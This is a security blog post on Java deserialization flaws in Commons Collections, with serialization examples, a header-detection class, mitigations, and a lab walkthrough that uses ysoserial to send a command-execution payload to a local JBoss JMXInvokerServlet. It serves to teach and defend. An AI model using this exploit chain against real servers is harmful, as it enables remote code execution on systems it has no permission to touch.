3 min read

The Forgotten Unserialization Vulnerability

Sasi Levi

Sasi Levi works as a senior cybersecurity researcher at Salt Security. Through his time in the cybersecurity sector, Sasi helped companies such as ConteXtream and Magic Leap develop and secure their applications.


There are lots of vulnerabilities out there, but I think the most important one has been forgotten. Compared to ImageTragick, the "unserialize vulnerability" was forgotten as fast as it was published. I first read about it on November 6th, 2015, when FoxGlove Security published their research, and since then I have heard about a real attack on PayPal servers.

In this blog post I'll focus on Java, and I'll use the JBoss application server for my demo. JBoss is an application server made up of several containers, such as a web container, an EE/EJB container, and so on. Its web container is based on Tomcat, but JBoss as a whole is completely different from Tomcat; see the references to read more about JBoss.

What’s serialization and deserialization

Serialization is the process of converting an object into a stream of bytes so it can be written to disk or sent over the network; deserialization is reading that stream back into an object. So when a process sends a request it serializes the data, and when the receiving process reads the data back it deserializes it. The classes ObjectOutputStream and ObjectInputStream handle serialization and deserialization respectively. Example:

```java
import java.io.*;

// Read a serialized object back from a file (deserialization).
public static Object deserialize(String fileName) throws IOException, ClassNotFoundException {
    try (FileInputStream fis = new FileInputStream(fileName);
         BufferedInputStream bis = new BufferedInputStream(fis);
         ObjectInputStream ois = new ObjectInputStream(bis)) {
        return ois.readObject();
    }
}

// Write an object to a file as a byte stream (serialization).
public static void serialize(Object obj, String fileName) throws IOException {
    try (FileOutputStream fos = new FileOutputStream(fileName);
         BufferedOutputStream bos = new BufferedOutputStream(fos);
         ObjectOutputStream oos = new ObjectOutputStream(bos)) {
        oos.writeObject(obj);
    }
}
```

Am I vulnerable too?

A simple check will show you whether you are vulnerable or not:

```
~/jboss-4.2.3.GA# grep -R InvokerTransformer .
```

Well, the results:

```
Binary file ./server/all/lib/commons-collections.jar matches
Binary file ./server/default/lib/commons-collections.jar matches
```

Also, run the same command in your development environment to see whether you are using Commons Collections or not (95% chance you are :)).

How to detect Java serialized object

Here's an example of the raw bytes of a serialized Java object:

```
AC ED 00 05 73 72 00 0A 53 65 72 69 61 6C 54 65 73 74 05 52 81 5A AC 66 02 F6 02 00 02 49 00 07
```

As you can see, I emphasized AC ED 00 05, the stream header that marks this as a Java serialized object (sometimes you'll also see Java class names in plain text in the request, as in artsploit's finding).
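To make that header check concrete, here is an added Java example (it is not code from the original post): it tests a request body for the raw AC ED 00 05 header and for its Base64 form, and reads only the name of the first class descriptor without deserializing anything, which is what a gateway or log pipeline needs in order to flag and record such requests. The sample bytes are the ones shown above; the class and method names are my own, and the Base64 prefix "rO0AB" is simply the encoding of the same four header bytes.

```java
import java.nio.charset.StandardCharsets;

public final class SerializedObjectDetector {
    // Stream header defined by the Java Object Serialization Stream Protocol.
    private static final byte[] MAGIC = {(byte) 0xAC, (byte) 0xED, 0x00, 0x05};
    private static final byte TC_OBJECT = 0x73;     // 's'
    private static final byte TC_CLASSDESC = 0x72;  // 'r'

    /** True if the body begins with the raw serialization stream header. */
    public static boolean startsWithStreamHeader(byte[] body) {
        if (body == null || body.length < MAGIC.length) return false;
        for (int i = 0; i < MAGIC.length; i++) {
            if (body[i] != MAGIC[i]) return false;
        }
        return true;
    }

    /** Base64 of AC ED 00 05 is "rO0ABQ==", so this prefix catches streams sent in text fields or cookies. */
    public static boolean looksLikeBase64Stream(String text) {
        return text != null && text.startsWith("rO0AB");
    }

    /**
     * Returns the class name of the first object in the stream, or null if the stream
     * does not begin with TC_OBJECT followed by TC_CLASSDESC. Only the header bytes are
     * inspected; nothing is instantiated.
     */
    public static String firstClassName(byte[] body) {
        if (!startsWithStreamHeader(body) || body.length < 8) return null;
        int p = MAGIC.length;
        if (body[p] != TC_OBJECT || body[p + 1] != TC_CLASSDESC) return null;
        p += 2;
        int len = ((body[p] & 0xFF) << 8) | (body[p + 1] & 0xFF); // 2-byte class name length
        p += 2;
        if (body.length < p + len) return null;
        return new String(body, p, len, StandardCharsets.UTF_8);
    }

    public static void main(String[] args) {
        // Constructed sample: the bytes quoted in the post (class "SerialTest").
        byte[] sample = {
            (byte) 0xAC, (byte) 0xED, 0x00, 0x05, 0x73, 0x72, 0x00, 0x0A,
            0x53, 0x65, 0x72, 0x69, 0x61, 0x6C, 0x54, 0x65, 0x73, 0x74,
            0x05, 0x52, (byte) 0x81, 0x5A, (byte) 0xAC, 0x66, 0x02, (byte) 0xF6,
            0x02, 0x00, 0x02, 0x49, 0x00, 0x07
        };
        System.out.println("raw header: " + startsWithStreamHeader(sample));   // true
        System.out.println("first class: " + firstClassName(sample));          // SerialTest
        System.out.println("base64 form: " + looksLikeBase64Stream("rO0ABXNyAApTZXJpYWxUZXN0")); // true
        System.out.println("plain JSON: " + startsWithStreamHeader("{\"a\":1}".getBytes(StandardCharsets.UTF_8))); // false
    }
}
```

The outer class name is useful for logging, but it is not a sufficient filter on its own: the gadget classes in a Commons Collections payload are nested inside an ordinary-looking outer object, so the sensible policy at a boundary that should never receive serialized Java objects is to reject on the header alone.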

How to exploit it: PoC example (Ubuntu, JBoss)

First, download JBoss 4.2.3. Second, download the ysoserial tool, which generates payloads for unsafe object deserialization.

After downloading JBoss, run the following commands:

Unzip JBoss

```
unzip jboss-4.2.3.GA.zip
```

Detect your local IP

Run ifconfig and copy the private IP, e.g. 192.168.231.132

Start Jboss

```
./run.sh -b 192.168.231.132
```

Verify Jboss has started

```
[Server] JBoss (MX MicroKernel) [4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181417)] Started in 5s:467ms
```

Clone ysoserial with git

```
git clone https://github.com/frohoff/ysoserial.git
```

Compile and build ysoserial

```
mvn clean install
```

Create the payload

```
~/ysoserial $ java -jar target/ysoserial-0.0.5-SNAPSHOT-all.jar CommonsCollections1 'touch /tmp/RCE_vuln.txt' > payload.out
```

Run Burp Suite, capture the request to the invoker servlet and send it to Repeater

```
http://192.168.231.132:8080/invoker/JMXInvokerServlet
```

Upload the payload in Burp Suite Repeater

In Repeater, change GET to POST, then right-click and upload the payload from the file

Check the machine where JBoss is installed

Run ls /tmp/ and you'll see RCE_vuln.txt

Conclusion

As you can see, you first need to verify that the site is vulnerable through Commons Collections, and only then create the payload and act. The following image shows the state of my machine after the attack succeeded.

[Image: Burp Suite and server side.]

Mitigations

Any application server should upgrade commons-collections to a release with the fix, e.g. COLLECTIONS-580, or upgrade JBoss itself (see the Red Hat solution in the references).

References

  1. https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/#background

  2. https://access.redhat.com/solutions/2045023

  3. https://github.com/frohoff/ysoserial

  4. https://www.paypal-engineering.com/2016/01/21/lessons-learned-from-the-java-deserialization-bug/

  5. https://en.wikipedia.org/wiki/Web_container

  6. http://docs.oracle.com/javaee/6/tutorial/doc/bnabo.html

  7. https://en.wikipedia.org/wiki/JBoss_Enterprise_Application_Platform

  8. https://sourceforge.net/projects/jboss/files/JBoss/JBoss-4.2.3.GA/jboss-4.2.3.GA.zip/download

  9. https://issues.apache.org/jira/browse/COLLECTIONS-580
